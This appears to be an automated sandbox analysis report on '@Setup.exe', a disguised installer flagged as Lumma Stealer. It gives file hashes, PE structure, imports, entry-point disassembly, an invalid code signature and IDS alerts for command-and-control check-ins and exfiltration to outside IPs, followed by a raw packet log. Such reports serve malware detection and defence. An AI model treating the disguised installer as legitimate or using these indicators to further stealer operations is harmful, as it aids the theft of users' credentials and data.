                                                                                                                                                  Entropy (8bit):0.13954043794048707
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                  SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                  SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                  SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):4.408405834485638
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:@Setup.exe
                                                                                                                                                  File size:73'409'778 bytes
                                                                                                                                                  MD5:c6f709a40a7d35051ee49ad1e367df65
                                                                                                                                                  SHA1:da1b6b9d9471644dc2ff198a4f392c374d4508bb
                                                                                                                                                  SHA256:cfef95129d9fd21cf9fdec5d1332cde09a7eb16144edf7867c0b398d5f67b036
                                                                                                                                                  SHA512:e514fc4f73b7f4b8ec70f3ef7e671a5f2823a1a3fd935aaddb13a67c216775f3a4eba2d1677cc6382a49af9ae806bdafaa2e3bcb863d1f2a0f4533df2a99dcdf
                                                                                                                                                  SSDEEP:24576:7r05zRihIi9rQbAVBsEnaUb9FsryJgMW89sUbx2mwY6:v0cOi9kbAVBsIaUb9FQkW8umAmo
                                                                                                                                                  TLSH:21F712927724E5FC4A61452A4347E9B373DF238002240D9CFEA6D09DED6627A4BCA0FD
                                                                                                                                                  Icon Hash:c8ceccb2a2d1f132
                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                  Subject Chain
                                                                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                  Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                  Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                  Serial:115BBE9E1C286827AF66E7A01390C206
                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push ebp
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  xor ebp, ebp
                                                                                                                                                  pop esi
                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                  push 00008001h
                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                  push 00000008h
                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                  call 00007F959451A80Bh
                                                                                                                                                  push ebp
                                                                                                                                                  push 000002B4h
                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                  push eax
                                                                                                                                                  push ebp
                                                                                                                                                  push 0040A264h
                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                  push 0040A24Ch
                                                                                                                                                  push 00476AA0h
                                                                                                                                                  call 00007F959451A4EDh
                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                  push eax
                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                  push edi
                                                                                                                                                  call 00007F959451A4DBh
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                  mov eax, edi
                                                                                                                                                  jne 00007F9594517DDAh
                                                                                                                                                  push 00000022h
                                                                                                                                                  pop esi
                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                  push esi
                                                                                                                                                  push eax
                                                                                                                                                  call 00007F959451A1B1h
                                                                                                                                                  push eax
                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                  mov esi, eax
                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                  jmp 00007F9594517E63h
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop ebx
                                                                                                                                                  cmp ax, bx
                                                                                                                                                  jne 00007F9594517DDAh
                                                                                                                                                  add esi, 02h
                                                                                                                                                  cmp word ptr [esi], bx
                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x4eea | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4600022 | 0x24d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x4eea | 0x5000 | 260ce69bf08624829200aa992cf66ec0 | False | 0.614990234375 | data | 5.891328935276688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x105000 | 0xfd6 | 0x1000 | 2f3325583e846b5bd3e76a8b19f08c09 | False | 0.568603515625 | data | 5.332844893533801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100238 | 0x192e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0017064846416381
RT_ICON | 0x101b68 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.3971724979658259
RT_ICON | 0x1041d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6365248226950354
RT_DIALOG | 0x104638 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x104738 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x104854 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x1048b4 | 0x30 | data | English | United States | 0.8541666666666666
RT_VERSION | 0x1048e4 | 0x330 | data | English | United States | 0.43995098039215685
RT_MANIFEST | 0x104c14 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-29T16:36:43.883961+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:44.615833+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:44.615833+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:45.933152+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:46.721563+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:46.721563+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:48.355991+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:50.668514+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:52.791981+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:55.581095+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:57.678094+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.32.1 | 443 | TCP
2024-12-29T16:36:58.495118+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49746 | 104.21.32.1 | 443 | TCP
2024-12-29T16:37:00.671379+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.32.1 | 443 | TCP
2024-12-29T16:37:04.245538+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.32.1 | 443 | TCP
2024-12-29T16:37:05.187085+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.32.1 | 443 | TCP
2024-12-29T16:37:07.586861+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 185.161.251.21 | 443 | TCP
2024-12-29T16:37:09.772266+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.37.128 | 443 | TCP
2024-12-29T16:37:10.699695+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 104.21.37.128 | 443 | 192.168.2.4 | 49750 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Dec 29, 2024 16:36:55.584671021 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.584753990 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.584783077 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359191895 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359287977 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359332085 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.359505892 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.359525919 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.371530056 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.371576071 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.371639013 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.371993065 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.372008085 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.678010941 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.678093910 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.679282904 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.679291964 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.679512978 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.680685997 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.680769920 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.680774927 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495116949 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495213032 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495263100 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:58.547147989 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:58.547178030 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:59.403192997 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403214931 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:59.403295040 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403599024 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403613091 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.671284914 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.671379089 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.672449112 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.672458887 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.672792912 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.673830032 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674496889 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674535990 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674652100 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674690008 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674798012 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674853086 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674989939 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675014973 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675163031 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675195932 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675358057 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675386906 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675399065 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675537109 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675576925 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719327927 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.719583988 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719629049 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719641924 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.763335943 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.763545990 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.763565063 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.811342001 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.813555956 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.855376005 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.917723894 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.919135094 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.919173002 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:01.039361000 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.981817007 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.981941938 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.982002974 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.982079983 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.982096910 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.983490944 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983534098 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.983598948 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983984947 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983995914 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.245434999 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.245537996 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.400356054 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.400401115 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.400862932 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.401823997 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.401845932 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.401917934 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187108994 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187247038 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187304020 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187438965 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187467098 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187479973 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187485933 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:06.146125078 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146230936 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:06.146331072 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146699905 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146734953 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.586769104 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.586860895 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.588427067 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.588448048 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.588655949 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.589767933 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.631346941 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114804983 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114876986 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114937067 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115113020 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115134954 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.115144968 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115150928 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.498627901 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.498687029 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.498760939 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.499093056 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.499109030 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.772190094 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.772265911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:09.773827076 CET49750443192.168.2.4104.21.37.128
